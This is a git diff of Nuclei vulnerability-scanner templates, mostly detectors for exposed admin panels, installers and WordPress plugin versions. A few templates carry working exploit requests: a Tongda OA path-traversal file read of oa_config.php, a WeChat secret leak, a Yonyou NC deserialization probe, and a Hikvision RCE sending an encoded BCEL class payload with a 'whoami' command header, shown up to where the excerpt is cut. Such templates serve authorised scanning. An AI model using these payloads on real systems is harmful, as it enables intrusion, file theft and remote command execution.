,internal ,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/ords/f?p=4600:32:0::NO" + matchers: + - type: word + part: body + words: + - "Create Employee" \ No newline at end of file diff --git a/poc/other/perfsonar-toolkit.yaml b/poc/other/perfsonar-toolkit.yaml index 405ada767b..338daf2059 100644 --- a/poc/other/perfsonar-toolkit.yaml +++ b/poc/other/perfsonar-toolkit.yaml @@ -4,6 +4,7 @@ info: name: perfSONAR Toolkit - Exposure author: DhiyaneshDk severity: medium + description: perfSONAR Toolkit is exposed. reference: - https://www.facebook.com/photo?fbid=619180260252497&set=pcb.619180283585828 metadata: @@ -30,5 +31,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205638ecd73fd2f0814a02b54f227b0e541417ebee9a5caa91679c06a436fae67d02200bdf3f69b6fe38687d1ca930b00e6fab8541725df454f62500d60e302e088d77:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d1e491aa0d5d2691a5a61f3ee04489df76010f8a4e4b338ae6593982bf98e84022100d6ef3d360ca57ca19041b6dcf456214dea2cc17ac405d64fdce12a0f4a12ce2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/posteio-admin-panel.yaml b/poc/other/posteio-admin-panel.yaml index ecb59d395e..c67a13c989 100644 --- a/poc/other/posteio-admin-panel.yaml +++ b/poc/other/posteio-admin-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Poste.io login panel was detected. metadata: + verified: true max-request: 1 shodan-query: title:"Administration login" html:"poste<span" - verified: true tags: panel,poste,login,detect http: @@ -28,4 +28,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022078ceda6943caf9eaea8f06370e59df812057432c56ba731d9e290c05cb2b60b5022028bd4da5d8e2525d75aa91d524b6cb60395d3c5f98486b36e5051a47f0443b3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b55115aadc034c27bec7b66d3d93be3b401c7bc6daa6af8838f8964b706c981b02205bd21f3d5288e64fc02fcae5a782dfa5ebb3171807164a8bb7686b7eb4ccbf8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/sharefile-storage-server.yaml b/poc/other/sharefile-storage-server.yaml new file mode 100644 index 0000000000..0c8b94a09a --- /dev/null +++ b/poc/other/sharefile-storage-server.yaml @@ -0,0 +1,32 @@ +id: sharefile-storage-server + +info: + name: ShareFile Storage Server - Detect + author: DhiyaneshDK + severity: info + metadata: + verified: true + max-request: 1 + shodan-query: title:"ShareFile Storage Server" + tags: tech,citrix,sharefile + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "ShareFile Storage Server" + + - type: status + status: + - 200 + +# digest: 4a0a0047304502207ca5079a2f0c74cbd6b9594958e360176f50fc609bf9de0c27bfdd93f78df544022100f40278d7ff54983742c56073d73db238786d79942ec91b1ccd52c4b1c93924cb:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/shopware-installer.yaml b/poc/other/shopware-installer.yaml index 308689e28b..a733acf4be 100644 --- a/poc/other/shopware-installer.yaml +++ b/poc/other/shopware-installer.yaml @@ -4,6 +4,7 @@ info: name: Shopware Installer author: DhiyaneshDk severity: high + description: Shopware is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.shopware.com/en/ metadata: @@ -29,5 +30,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502202b71d5beb7169544e2ac3e1438ba963b75e6e4a2f3841bf6b7d22bd688ffd3f2022100c5f052555a072a2b3ed6df38beed53cd37c7b39a871be80c209628ee2f24d7e8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c49d7dd7b97eb87d5b4de3f9e09232a82505cd82cf325da8d921f8ae060ba4f4022100a7a8fbaacad106a6f9797a34c058e728821f47099467a86276a92d3bc3a55cd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/smokeping-grapher.yaml b/poc/other/smokeping-grapher.yaml index f708f3d940..f3557e5172 100644 --- a/poc/other/smokeping-grapher.yaml +++ b/poc/other/smokeping-grapher.yaml @@ -4,6 +4,7 @@ info: name: SmokePing Latency Page for Network Latency Grapher author: DhiyaneshDk severity: low + description: SmokePing Latency Page is exposed. reference: - https://www.facebook.com/photo/?fbid=620494143454442&set=a.467014098802448 metadata: @@ -27,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b5732eafebe6bf8f0befe6e8d98f6b3ed87ec3ff6803b1702afc246414f3fe290220542d31ceced0ebb1011464eebbece7267f47a5c261e8cf2590bbf21296753466:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a0048304602210093977592f924589f38b0d3ce6d54c601887c3757b346a722ef5ce3eaf97bba15022100b554db331a1ef594a70b073a4bd6ea63b6baca597b7df6b1dc8711a9ae9f7e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/softether-vpn-panel.yaml b/poc/other/softether-vpn-panel.yaml index 3581b61723..9c3056ef53 100644 --- a/poc/other/softether-vpn-panel.yaml +++ b/poc/other/softether-vpn-panel.yaml @@ -7,9 +7,9 @@ info: description: | SoftEther VPN panel was detected. metadata: + verified: true max-request: 1 shodan-query: http.title:"SoftEther VPN Server" - verified: true tags: panel,vpn,softether http: @@ -27,4 +27,4 @@ http: - type: status status: - 202 -# digest: 4a0a0047304502205b2744b4d7eaf8ab595dc3b1ad05f36b1ed2a652cf069a374de602973618a627022100f5ce74d77c78ebe397021ccd13377dc2230d844ca3b10bc487b411ff835694c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203ea2a620879e215c4dbd1cab9c42a764385f653352b9789f742051f87b453f9002200c2635c46a856f96f399b55e405ff851d578d745600bafc9042054ff408abb14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/spa-cart-installer.yaml b/poc/other/spa-cart-installer.yaml new file mode 100644 index 0000000000..be1b1404b0 --- /dev/null +++ b/poc/other/spa-cart-installer.yaml @@ -0,0 +1,32 @@ +id: spa-cart-installer + +info: + name: SPA Cart - Installer + author: pussycat0x + severity: high + description: SPA Cart installer was found. + reference: + - https://spa-cart.com/ + metadata: + max-request: 1 + fofa-query: title="SPA Cart Installation" + tags: spa-cart,exposure,installer,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/install/" + + matchers-condition: and + matchers: + - type: word + words: + - "<title>SPA Cart Installation" + - "PHP Version" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022100c09a075668a57e2d44045c4514e35e620d873c092058b30c3a1e02328aa2406802201c2d079dca0ab6762bee18dc881e0c9a434ada56ebf406148800a2639d1a6c46:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/sugarcrm-install.yaml b/poc/other/sugarcrm-install.yaml index a2c22376a5..d5841e1212 100644 --- a/poc/other/sugarcrm-install.yaml +++ b/poc/other/sugarcrm-install.yaml @@ -4,6 +4,7 @@ info: name: SugarCRM Exposed Installation author: ritikchaddha severity: high + description: SugarCRM is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -25,5 +26,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200e82aa9e4f0d4c2f5c8f36f3710b33967e2cb36e26967c9a793a20521c32c9e9022026181a8cf98e08cfea6c1f9662f4550eb99b75294b536b05d7e7491b6e0590b2:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204aa5775363df16fcc9b7177b7e5535656387f69878298b7114308780795e43fb022100e3cc8bd09ff81291094aecb1097c7e2ae8d418f78225929896f5917f23a5fdc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/tautulli-install.yaml b/poc/other/tautulli-install.yaml index 33a54a95bf..72331e446a 100644 --- a/poc/other/tautulli-install.yaml +++ b/poc/other/tautulli-install.yaml @@ -4,6 +4,7 @@ info: name: Tautulli - Exposed Installation author: ritikchaddha severity: high + description: Tautulli is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -26,5 +27,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022003e945b43ba5589fe6afe1630beafd30a7e5c6e9cbbd7d05329110b7dca63195022100f367fe96b977d613dd829ed31a000d7a00b1e6443f2555efc0bcebe498065bd4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100bfe29789f1c1752dab4a78bca7cd9aa515a3650baa916d8e4588bdcacd0476ea022018454d3ca30b089180fc1abadcc3490ed3cf0092caa9b50d62472e88792e1211:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/tongda-video-file-read.yaml b/poc/other/tongda-video-file-read.yaml new file mode 100755 index 0000000000..a25dbec320 --- /dev/null +++ b/poc/other/tongda-video-file-read.yaml @@ -0,0 +1,33 @@ +id: tongda-video-file-read + +info: + name: Tongda OA V2017 Video File - Arbitrary File Read + author: SleepingBag945 + severity: medium + description: | + There is an arbitrary file reading vulnerability in Extreme OA video_file.php. An attacker can obtain sensitive files on the server through the vulnerability. + reference: + - http://wiki.peiqi.tech/wiki/oa/通达OA/通达OA%20v2017%20video_file.php%20任意文件下载漏洞.html + metadata: + verified: true + max-request: 1 + fofa-query: icon_hash="1967132225" + tags: tongda,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php" + + matchers-condition: and + matchers: + - type: word + words: + - "$ROOT_PATH" + - "$ATTACH_PATH" + + - type: status + status: + - 200 + +# digest: 490a0046304402203d491497c57e0e70a7266b53e860b9ed5af0df0ac64ec101644c39221cc2004702205268afb077d307842fefa4b8ac93cf269be3bdb7011060114dfdde10d52d3035:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/untangle-admin-setup.yaml b/poc/other/untangle-admin-setup.yaml index d5bc3bf07f..1ea0c52d38 100644 --- a/poc/other/untangle-admin-setup.yaml +++ b/poc/other/untangle-admin-setup.yaml @@ -4,6 +4,7 @@ info: name: Untangle Exposed Admin Signup author: ritikchaddha severity: medium + description: Untangle Exposed Admin Signup is exposed publicly. metadata: verified: true max-request: 1 @@ -28,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502206d051dd5350c45cabe20dcc3a29e0c3b3bfcbe3018bd85d7e3ca3d2e22b83f53022100888c309964c9101cf88e77b4b6119572e08e0337fc0278f051f6f81b1f19bb82:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100d42c9165fc09a3a5155eb20e9de1d953b57381acddd1ce6942fe386dea3d884c022052d8ec52b7ebebbb449b6e557920fbf94eb672e29a82ffd7a8bb479cac842ccc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/other/wechat-info-leak.yaml b/poc/other/wechat-info-leak.yaml new file mode 100644 index 0000000000..89ecb10f3f --- /dev/null +++ b/poc/other/wechat-info-leak.yaml @@ -0,0 +1,31 @@ +id: wechat-info-leak + +info: + name: WeChat agentinfo - Information Exposure + author: SleepingBag945 + severity: high + description: | + There is an information leakage vulnerability in the agentinfo interface of Tencent Enterprise WeChat. An attacker can obtain the Enterprise WeChat Secret through the vulnerability. + reference: + - https://github.com/Threekiii/Awesome-POC/blob/f7869eb69bad66d177a88df4cebfe584691651ce/%E5%85%B6%E4%BB%96%E6%BC%8F%E6%B4%9E/%E8%85%BE%E8%AE%AF%20%E4%BC%81%E4%B8%9A%E5%BE%AE%E4%BF%A1%20agentinfo%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.md + metadata: + verified: true + max-request: 1 + fofa-query: body="wework_admin.normal_layout" + tags: wechat,exposure,tencent + +http: + - raw: + - | + GET /cgi-bin/gateway/agentinfo HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 && contains(body_1,"errcode") && contains(body_1,"strcorpid") + - contains(body_1,"corpid") + condition: and + +# digest: 490a0046304402207f486e40109265aad0c4dbad59a5f8796ffbe6ce2d5707c954f4fe749f5f20fa0220570d64485600b1b15c5fd02eadd4efe5a190588c346ac31ee8f25047e7b55b7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/yonyou-nc-baseapp-deserialization.yaml b/poc/other/yonyou-nc-baseapp-deserialization.yaml new file mode 100755 index 0000000000..9c9651a8bb --- /dev/null +++ b/poc/other/yonyou-nc-baseapp-deserialization.yaml @@ -0,0 +1,28 @@ +id: yonyou-nc-baseapp-deserialization + +info: + name: Yonyou NC BaseApp UploadServlet - Deserialization Detect + author: SleepingBag945 + severity: high + description: | + Yonyou NC is an enterprise-level management software, widely used in large and medium-sized enterprises.Realize modeling, development, inheritance, operation, management integration of IT solution information platform.UFIDA NC for C/S architecture, the use of Java programming language development, the client can directly use UClient, the server interface for HTTP.A page of UFIDA NC6.5, there is arbitrary file upload vulnerability.The cause of vulnerability is that there is no type restriction at the uploading file, and an attacker without authentication can take advantage of this vulnerability by sending special data packets to the target system, and a remote attacker who successfully takes advantage of this vulnerability can upload any file to the target system to execute commands. + reference: + - https://github.com/cqr-cryeye-forks/goby-pocs/blob/main/Yonyou-NC-BaseApp-UploadServlet-Deserialization-RCE.json + metadata: + verified: true + max-request: 1 + fofa-query: app="Yonyou-UFIDA-NC" + tags: yonyou,nc,fileupload,baseapp,deserialization,intrusive + +http: + - method: GET + path: + - "{{BaseURL}}/service/~baseapp/UploadServlet" + + matchers: + - type: dsl + dsl: + - 'status_code_1 == 200 && contains_all(body_1,"java.io","EOFExceptionYI")' + condition: and + +# digest: 4a0a0047304502206bf0c638958001afad3ac481fa22472c2f2a4f1a14a75ea3d81d5e14a018b923022100cccf2c9cacc806de75ec4b150aaea3aa365c3d9eb9e8dec19bab6684d16c5e19:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/yonyou-nc-info-leak.yaml b/poc/other/yonyou-nc-info-leak.yaml new file mode 100644 index 0000000000..357b6d2081 --- /dev/null +++ b/poc/other/yonyou-nc-info-leak.yaml @@ -0,0 +1,35 @@ +id: yonyou-nc-info-leak + +info: + name: Yonyou UFIDA NC - Information Exposure + author: SleepingBag945 + severity: medium + description: | + After logging in and visiting the address where the information was leaked, you will have permission to upload files. Then just go back to the homepage and view the published content directly. + reference: + - https://mp.weixin.qq.com/s/Lu6Zd9LP3PQsb8uzTIcANQ + - https://github.com/zhangzhenfeng/AnyScan/blob/master/AnyScanUI/AnyPoc/data/poc/bugscan/exp%EF%BC%8D2311.py + metadata: + verified: true + max-request: 1 + fofa-query: app="用友-UFIDA-NC + tags: yonyou,nc,exposure + +http: + - method: GET + path: + - "{{BaseURL}}/service/~iufo/com.ufida.web.action.ActionServlet?TableSelectedID&TreeSelectedID&action=nc.ui.iufo.release.InfoReleaseAction&method=createBBSRelease" + + matchers-condition: and + matchers: + - type: word + words: + - "iufo/web/images/usericon.gif" + - "/iufo/web/images/tree/tree_plus.gif" + condition: and + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ba808960df0e03550d2e5eda2a333ad6a26eaa3bd173d2b3ba85aec8f68d5324022100e76f70ee0cefdda44f1a51fa6b25e5a3c00881bc6ccadb6b7bc1f58af1c68889:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/zencart-installer.yaml b/poc/other/zencart-installer.yaml index 57d88dd291..dfc9451882 100644 --- a/poc/other/zencart-installer.yaml +++ b/poc/other/zencart-installer.yaml @@ -4,6 +4,7 @@ info: name: Zen Cart Installer author: DhiyaneshDk severity: high + description: Zen Cart is susceptible to the Installation page exposure due to misconfiguration. reference: - https://www.zen-cart.com/ metadata: @@ -28,5 +29,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202cbf616bc15702cfbd73fe87e0fc0d463e1621b609e29a8768be48c70ef44cb402206ec29a7a10375d7697bcead710d1397a913d486ef27b8c08d1196802c35f9b67:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450220186141ea271e865ffc608b9d1e05bd48a7004e2f67d90e6abe28f03b12f609a00221009533d5330fed8366314bf91338d33bf7b492f1042cdf4861019f3417058e57a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/php/custom-css-js-php.yaml b/poc/php/custom-css-js-php.yaml new file mode 100644 index 0000000000..efbbeaf2e4 --- /dev/null +++ b/poc/php/custom-css-js-php.yaml @@ -0,0 +1,59 @@ +id: custom-css-js-php + +info: + name: > + Custom CSS, JS & PHP <= 2.0.7 - Cross-Site Request Forgery Bypass + author: topscoder + severity: medium + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d21dc02f-789c-497e-9d01-02fa49bf9e30?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/plugins/custom-css-js-php/" + google-query: inurl:"/wp-content/plugins/custom-css-js-php/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-plugin,custom-css-js-php,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/custom-css-js-php/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "custom-css-js-php" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.7') \ No newline at end of file diff --git a/poc/php/phpgedview-installer.yaml b/poc/php/phpgedview-installer.yaml new file mode 100644 index 0000000000..868bacb8c6 --- /dev/null +++ b/poc/php/phpgedview-installer.yaml @@ -0,0 +1,32 @@ +id: phpgedview-installer + +info: + name: PhpGedView Installer Exposure + author: ritikchaddha + severity: high + description: PhpGedView is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"/phpgedview.db" + tags: misconfig,phpgedview,install,exposure + +http: + - method: GET + path: + - '{{BaseURL}}/install.php' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Installation Wizard' + - 'phpgedview' + condition: and + case-insensitive: true + + - type: status + status: + - 200 +# digest: 4b0a00483046022100de5413c40cec17c528938b4d5331f66f32e7fedec740d8c834a338f13818067902210088f6d96fcefb274b9018df7f7bd42a801d545080f844ba73d4e9d78162110bcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/php/phplist-detect.yaml b/poc/php/phplist-detect.yaml new file mode 100644 index 0000000000..abeee78371 --- /dev/null +++ b/poc/php/phplist-detect.yaml @@ -0,0 +1,42 @@ +id: phplist-detect + +info: + name: phpList - Detect + author: ricardomaia + severity: info + description: | + phpList is an open source newsletter manager. + reference: + - https://www.phplist.org/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phplist" + tags: tech,phplist,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + matchers: + - type: word + part: body + words: + - 'content="phpList' + - 'phpList Ltd' + - 'phpList' + condition: or + case-insensitive: true + + extractors: + - type: regex + name: version + part: body + group: 1 + regex: + - '(?i)version.((\d\.?)+)' + +# digest: 4b0a00483046022100b9689d0d38d96a02736636f6b53b41e7c80d65679297db556f6cc0eea8c2417c022100bbdd5891a3b8f5a2ac5070c9420030c82f3bbfcd1d405bf0403634c13c695a61:922c64590222798bb761d5b6d8e72950 diff --git a/poc/php/phpsys-info.yaml b/poc/php/phpsys-info.yaml new file mode 100644 index 0000000000..9b2806bd2b --- /dev/null +++ b/poc/php/phpsys-info.yaml @@ -0,0 +1,33 @@ +id: phpsys-info + +info: + name: phpSysInfo Exposure + author: fpatrik + severity: low + description: | + phpSysInfo: a customizable PHP script that displays information about your system nicely + reference: https://phpsysinfo.github.io/phpsysinfo/ + metadata: + verified: true + max-request: 1 + shodan-query: html:"phpSysInfo" + tags: config,exposure,phpsysinfo + +http: + - method: GET + path: + - "{{BaseURL}}/phpsysinfo/index.php?disp=bootstrap" + + matchers-condition: and + matchers: + - type: word + words: + - 'phpSysInfo' + - 'Hardware Information' + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022007eae5c482391a502e1165c940ad07ee2b0c4d9d00ef45dbb05bd2c905480dc7022100e054e5cf9b85bd1a6b75e9e2a959d8176c1a04831e8788c670bdc539ed361df5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/php/thinkphp-errors.yaml b/poc/php/thinkphp-errors.yaml index fe1eff3613..bd0a14bc47 100644 --- a/poc/php/thinkphp-errors.yaml +++ b/poc/php/thinkphp-errors.yaml @@ -4,6 +4,7 @@ info: name: ThinkPHP Errors - Sensitive Information Exposure author: j4vaovo severity: medium + description: ThinkPHP error is leaking sensitive info. metadata: verified: true max-request: 1 @@ -45,5 +46,4 @@ http: - 500 - 404 condition: or - -# digest: 490a0046304402201ed9eeddb84684c81cad2e9dd5bae4b23de5d31ea95354508dbca365e888a7c302207d05684ef6245fa925fe4d817ba6bddaa3bfbe391f9ea3fac92d0de4f4df3054:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022003b009962dedd16ae6b50cf5a4c5880e38788366de0a4365a425d5d5b1141ad60220631fa6eea81343a0d0fce43cf8db4c0e7d87a6dc9b02403426e526a5a04bd5dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml index 7e328a8b1b..0ebd67934b 100644 --- a/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml +++ b/poc/remote_code_execution/Hikvision_applyCT_RCE.yaml @@ -1,50 +1,27 @@ id: HIKVISION info: - name: HHIKVISION iVMS-8700 upload Webshell file - author: zerZero Trust Security Attack and Defense Laboratory + name: HIKVISION + author: Zero Trust Security Attack and Defense Laboratory severity: high description: | - HHIKVISION iVMS-8700 Comprehensive Security Management Platfor upload Webshell file + There is a command execution vulnerability in Hikvision's comprehensive security system. Hackers can execute system commands through the vulnerability metadata: - fofa-query: icon_hash="-911494769" - hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" + fofa-query: app="HIKVISION-综合安防管理平台" + hunter-query: web.title="综合安防管理平台" -variables: - str0: '{{BaseURL}}/eps/api/resourceOperations/uploadsecretKeyIbuilding' - http: - raw: - | - POST /eps/api/resourceOperations/upload?token={{toupper(md5(str0))}} HTTP/1.1 + POST /bic/ssoService/v1/applyCT HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Android 3.2.5; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: close - Content-Length: 184 - Content-Type: multipart/form-data; boundary=c4155aff43901a8b2a19a4641a5efa15 - - --c4155aff43901a8b2a19a4641a5efa15 - Content-Disposition: form-data; name="fileUploader"; filename="test.jsp" - Content-Type: image/jpeg - - {{randstr}} - --c4155aff43901a8b2a19a4641a5efa15-- - - - | - GET /eps/upload/{{name}}.jsp HTTP/1.1 - Host: {{Hostname}} - - extractors: - - type: json - name: name - json: - - ".data.resourceUuid" - internal: true + Content-Type: application/json + Testcmd: whoami + + {"CTGT": {"a": {"@type": "java.lang.Class", "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"}, "b": {"@type": "java.lang.Class", "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "c": {"@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", "driverClassLoader": {"@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"}, "driverClassName": "$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$a5Wyx$Ug$Z$ff$cd$5e3$3b$99$90dCB$W$uG$N$b09v$b7$a1$95B$c2$99$90$40J$S$u$hK$97P$db$c9$ec$q$3bd3$Tfg$J$a0$b6$k$d4$D$8fZ$8f$daPO$b4$ae$b7P$eb$s$U9$eaA$b1Z$8fzT$ad$d6zk$f1$f6$8f$da$f6$B$7c$bf$99$N$d9$84$ad$3c$3e$sy$be$f9$be$f7$7b$ef$f7$f7$be3y$fc$e2$p$a7$A$dc$80$7f$89$Q1$m$60P$84$PI$b6h$Cv$f3$Y$e2$91$f2$a3$E$c3$8c$a4$f30x$8c$88t$de$p$c2D$9a$JY$C2$ecr$_$8fQ$B$fb$E$ec$e7q$80$R$5e$c3$e3$b5$ec$f9$3a$R$d5$b8S$c4$5dx$3d$5b$de$m$e2$8dx$T$5b$O$K$b8$5bD7$de$cc$e3$z$ec$fcV$Bo$T$d1$84C$C$de$$$e0$j$3c$de$v$e0$5d$C$ee$R$f0n$k$f7$Kx$P$8f$f7$96$a0$B$efc$cb$fb$F$dc$t$e0$D$C$ee$e71$s$e00$T$bc$93$z$P$I$f8$a0$80$P$J$f8$b0$80$8f$88$f8$u$3e$c6$a8G$E$7c$5c$c0$t$E$3c$u$e0$93$C$b2$3c$3e$c5$e3$d3$o6$e03l$f9$ac$88$cf$e1$f3$o$d6$e3$L$C$be$c8$9eG$d9r$8c$89$3e$c4$7c$fc$S$d3$f4$b0$88$_$p$c7c$9c$83o$b5$a6k$d6Z$O$eeP$dd$z$i$3cmFB$e5P$d6$a5$e9jOf$b8_5$7b$e5$fe$UQ$fc$a3$a6f$a9$adFb$3f$879$a1$ae$dd$f2$5e9$9a$92$f5$c1$e8$d6$fe$dd$aab$b5$f4$b52$f1$d2$98$r$xC$dd$f2$88$zE$89$a4$U$da$b9$k$e2$m$b6$efS$d4$RK3$f44$H$ef$a0ju$90$c0$ca$o$aa$K$u1$cb$d4$f4$c1$96$ba$x$99xLPY8$I$ab$95$94$j$B$8f$e3$94$40$ca$_$r$97$c7$pd$_fdLE$ed$d0$98$fbe$bd$c6$b0$o$5b$edJ$d2$880$5d$Sz$b0$95C$ada$OF$e4$RYI$aa$R$cb$e6$88d$y$z$V$e9$cf$MDZ$f7$5bj$5b2$a3$PI8$81$afH8$89Sd$$$adZ$ec$82B$u$9b$f2$a9$z$r$a7$89$e2$eak$95p$gg$q$3c$8a$afr$u$9f$e94$87$8a$vR$a7n$a9$83$aa$c9$i$f9$g$8f$afK$f8$G$ceJx$M$e78$f0$Jc$H$cb$b6$84o2$3d$8bf$Y$ea1$ac$O$p$a3$t$$$e7$93C$rc$89$e8$9aa$7b$dd$9a$Z$YPM$w$e6$a8$v$8fpX8$r$dfc$c42J$b2$5b$b5$92$c6$94$b8$84$c7$f1$z$O$Lf$b2uhj$aa$90$eb$db8$c7$bc$7d$82R$_$e1$3b$f8$ae$84$ef$e1$fb$94v$JO$e2$H$S$7e$88$l$91$ebV$d2T$e5DZ$c2N$f4$91_$7d$F$95$eb$b5$afZ$q$fc$YO$91s$ea$3eU$91$f0$T$fc$94$f6I$cb$oG$7d$96l$S$$8$E$a6$84$b6gt$ddA$a0$cfJj$e9$da$eb$c8FR$d6$T$v$W$a0o0e$f4$cb$a9$7c$fc$8e$40AV$c4$R$d3P$d4t$da0$a98$b3l$WV$ddh$97$96$b6$q$fc$MO$b3$I$7eN$d07$d5$3d$iJ$c8$f4v5$3dB$f8dx$a7$d3fr$97$99$v$9f$JH$c2A$af$9a$b6TB$93$84_$e0$Zb$t$5c$Q$f6$ad$MY$f2$cb$89$c4$a4$u$cf$f8$94$e1$E$ed$8ctD$97$87$a9$v$7e$v$e1Y$fcJ$c2$afY$g$7c$a3$9a$9e0F$e9$9e$b8$o$94$T$82QT$a1c$b4_$d3$a3$e9$q$j$c3$ca$qpl$efc$8a$ac$ebLw$cd$94$5b$db$9c$40$5b3Z$w$e1$60$ea7$S$7e$8b$df$f1$f8$bd$84$3f$e0$8f$8c$f2$tR$b5k$83$84$e7p$5e$c2$9f$f1$94$84$bf$e0$af$S$b6$p$s$e1o$f8$3b$8f$7fH$f8$tsi$9eb$MG$H$e4$b4$b5$3bm$e8$d1$bd$99Tt$aay$a8$f9$a7$ac$9a$ea$40$8a$60$j$b5$812$zMN$a9g$d4$3f$df$cc$U$db$80a$f6P$w8$y$J$fd$f7f$b7$f1N$S$r$ba$3a$da$a9$a7$zYWHjv$a8$c8$40$m$U$f5$c6$b7$b5S$aa$8a$c8WP57$aaJJ6$d5$84$83$7e$O$eb$8b$d8$ee$bbB$b6$d0$d2d$bc$8e$Gf1$d4$c9$a6$5e$cd$cb$b1Py5$7d$af1D$3e$af$w63$af$q$V$NL$m$ef$f3$p$a62T$y$3d$M$ac$93$W$cb$LB$cd$X$s$7c$95$yO$ab$p$a9$x$r$V$b1$cc$88j$w$8e$d1$aab$f2l$da$T$e87$u$Mx$9a$dd$a1$9e$d0NFv$db$3d$bc$b4H$c0E$a3$xU2$a6$a9$ea$d6$qf$a6W7$3f4$a8$7fI$abs$d8d$g$Z$9a$W$c1$o$7c$f6$VC$Y1$3b$I$9b$ae$ed2$E$F$c5$d0$zYc$af$a2y$85$8e$b6$re3$a6$ee$c9$a8$E$b4$96$ba$9d$USZ$3b$a0$dao$c7N$96$88$ce$a2$n$f0Z$ba$7dx$c4$dao$f3$ed$9c$3e0$f6$d3$9c$Yv$a6$Lu$v$r$95$b1$z$bdJE$$$fbYb$Z$5d$c6$a8j$b6$c9l$uU$87$8a$f4$TK$b9$97Z$c3$b4$98$83$85Z$f2S$a1e$da$7b$tOt$S$da$a9$8fdhnQ$ea$86$d9k$3d$_$ac$Z$d1$82$L$S$af$J$V$bd$60$96$a5LZ$dd$a8$a6$b4az_$d1LZ$f6$f2$81$V$O$_$d6$3b$ba$ba$cfr$b0$9d$7f$a1zBu$7d$ad$O$fa$f2$99$d2$Y$b9$sT$a8$60$ea$86t$cc$$F$t$9d$96$e1$98$c6b$fa$e2$R$c1